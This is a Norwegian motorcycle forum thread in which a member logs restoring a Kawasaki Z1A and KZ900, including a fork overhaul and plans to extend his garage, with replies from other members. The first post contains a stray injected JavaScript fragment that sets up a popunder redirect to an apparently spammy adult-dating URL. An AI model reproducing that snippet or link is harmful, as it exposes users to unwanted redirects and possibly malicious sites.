Z1 900 og KZ900 logg

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Svar
Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Se en veldig stor samlingen av japanske sykler.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Da var forgaffelbeina komplette igjen …
IMG_5268.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Online
Brukeravatar
Jompa
Moderator
Innlegg: 6968
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Garasje’n Z1A og KZ900

Legg inn av Jompa »

Det ble blankt og fint, ja.
Er nylocmutrene " originale " ?
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Jompa skrev: 02 des 2023, 15:01 Det ble blankt og fint, ja.
Er nylocmutrene " originale " ?
Ja fornøyd nå. Nei de låsemutterne er ikke originale @Jompa :) Skal ta med 4 stk vanlige neste gang jeg er på shopping for det er jo sprengskiver der.

Har bytta unbrako skruer med kobberpakning i bunn, o-ringer, nye pakninger på drenskruene, nye simmringer med anleggshylser og låseringer, nye utvendig gummimansjetter, olje selvfølgelig og pussa nedre indre gaffelbein med 1200 vannslipepapir.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Online
Brukeravatar
Jompa
Moderator
Innlegg: 6968
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Garasje’n Z1A og KZ900

Legg inn av Jompa »

Hvordan var glidehylsene inni gaffelen ?
På GPz,en var de veldig slitte og ble bytta.
Den hadde luftfjæring både foran og bak med noe som ligna en dekkventil oppe på venstre gaffelben og forbindelse mellom rørene .
Egen fylleventil på støtdemperen bak.
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Ja det er det samme som på Z1000J, på min har jeg fulgt manualen med limit mål og mengder.

Usikker på beskrivelse av noen deler, det ligger jo bilder av all innmat i tråden her :)

Edit: Nå skjønner jeg ingen ting, her forsvant jo hele innlegget :scratch
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Online
Brukeravatar
Jompa
Moderator
Innlegg: 6968
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Garasje’n Z1A og KZ900

Legg inn av Jompa »

Min feil jeg må ha trykket på delete da jeg siterte ett avsnitt av innlegget ditt.
Beklager.

Men det jeg kalte glidehylser er foringene inne i gaffelen.
Jeg kan ikke se dem på noen av bildene.
Mulig foringer i gaflene kom senere ?
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: Garasje’n Z1A og KZ900

Legg inn av rolf-arne »

@dypen , har fulgt med på gaffel overhalinga, og skal "snart" igang med samme jobben på Pan European. Der må jeg også skifte lager... kommer sikkert tilbake med spørsmål...

Sent fra min SM-A715F via Tapatalk

Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

rolf-arne skrev: 03 des 2023, 06:12 @dypen , har fulgt med på gaffel overhalinga, og skal "snart" igang med samme jobben på Pan European. Der må jeg også skifte lager... kommer sikkert tilbake med spørsmål...

Sent fra min SM-A715F via Tapatalk
Styrelager som skal byttes eller …Gaffelbeina: Litt plass med noe å vaske delene i sammen med masse filler og litt verktøy selvfølgelig. Anbefaler en stor pipe eller hylse for å presse / dunke inn simmringene.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Det går i små steg …
IMG_5293.jpeg
IMG_5297.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Har fått noen kommentarer på størrelsen på garasjen vår men den er ikke stor, hele 42 m² pluss at vi har ett isolert uthus på 30 m² der jeg har tanker om å forlenge garasjetaket for å koble det til uthustaket for å få større plass. I dag er det tilrettelagt en vaskeplass bak garasjen og med kjøreport i bakveggen på garasjen som gjør det mulig. I teorien er det tak, to vegger pluss ei dør mellom uthus og garasje som skal til for å utnytte arealet. Har fått noen tips om at jeg bør ta ut litt masse mot nabo i øst for å få rett vegg, under vaskeplassen er det drenert masse, isolasjon, støpt plate med avløp hvor bakveggen mot nabo i nord er støpt. Prosjektet må plassbygges og det lille av masse som må ut må tas gjennom garasjen med en bobcat eller lignende. Naboene har ingen innvendinger og er positive men kommunen må godkjenne fra både på utnyttelsesgrad som overgår grense med noen få kvadratmeter samt uthus / garasje som blir over 50 m². Hvis det er mulig å godkjenne prosjektet i kommunen ville det vært fristende å forsøke å bidra mye med egeninnsats forutsett en snekker ville gå med på det.

Har en gammel tråd på forumet «The Garage Journal» fra tiden jeg isolerte garasjen og la ting til rette for mer enn parkering. Fra tom garasje med ny bakvegg, nytt uthus og vaskeplass bak garasjen. For interesserte ta en titt på linken, photobucket er brukt til bilder noe som alle vet hva det betyr.

https://www.garagejournal.com/forum/thr ... ge.315419/
IMG_0138.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: Garasje’n Z1A og KZ900

Legg inn av rolf-arne »

dypen skrev:
rolf-arne skrev: 03 des 2023, 06:12 @dypen , har fulgt med på gaffel overhalinga, og skal "snart" igang med samme jobben på Pan European. Der må jeg også skifte lager... kommer sikkert tilbake med spørsmål...

Sent fra min SM-A715F via Tapatalk
Styrelager som skal byttes eller …Gaffelbeina: Litt plass med noe å vaske delene i sammen med masse filler og litt verktøy selvfølgelig. Anbefaler en stor pipe eller hylse for å presse / dunke inn simmringene.
Tror det blir både og, når man først tar i fra hverandre en gammel sykkel, så kan det være like greit å gjøre alt ,skikkelig

Sent fra min SM-A715F via Tapatalk

Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Helt klart @rolf-arne det blir alltid mer å ta tak i når du første demonterer :)
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Som nevnt i innlegg tidligere om å utvide garasje / uthus litt …
Garasjen er 42 m² pluss isolert uthus på 30 m² der jeg ønsker å forlenge garasjetaket for å koble til uthustaket. I dag er det tilrettelagt en vaskeplass bak garasjen og med kjøreport i bakveggen på garasjen som gjør det mulig. I teorien er det tak, to vegger pluss ei dør mellom uthus og garasje som skal til for å utnytte arealet. Har fått noen tips om at jeg bør ta ut litt masse mot nabo i øst for å få rett vegg, under vaskeplassen er det drenert masse, isolasjon, støpt plate med dren hvor bakveggen mot nabo i nord er støpt.
Legger ved første bilde av hvordan det er tenkt å forlenge garasjetaket for å koble det til uthustaket, bilde to viser hvordan det er i dag med to bygg separat garasje og uthus.

Tenker stålbjelke i mønet på forlengelsen med plassbygde takstoler for å få full takhøyde innvendig på tilbygg.

Har vært inne på tanken å gjøre alt selv men usikker på om jeg er kapabel for jobben, en annen variant vil være å bidra mye (håndlanger / ryddegutt) med egeninnsats forutsett en snekker ville gå med på det.

Hvis det er noen som har synspunkter, innvendinger, enklere løsning, annen løsning, mere prisgunstig eller andre innspill setter jeg stor pris på det :prf
IMG_5355.jpeg
IMG_5357.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
dypen
Innlegg: 5295
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: Garasje’n Z1A og KZ900

Legg inn av dypen »

Kaldt ute idag med -24,5 men venter på hjula til Z1A’n som er lovet ferdige, har egentlig litt å ta tak i da jeg har mye på plass som kan monteres.

Mere verktøyskap og arbeidsbord fra Netthandelen bestilt 1 nyttårsdag som visstnok kommer inn døra i dag ifølge Bring.
Perfekt verktøyvogn for de som ikke har plass til en stor innredning, men som samtidig ønsker mye oppbevaringsplass og en benkeplate for diverse arbeid. Spesifikasjoner: Materiale: rustfritt stål, aluminium, tre Mål: 122 x 48,5 x 91 cm (L x B x H) Tykkelse benkeplate: 35 mm, 4 skuffer og 1 skap med regulerbar hylle.
IMG_0222.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Svar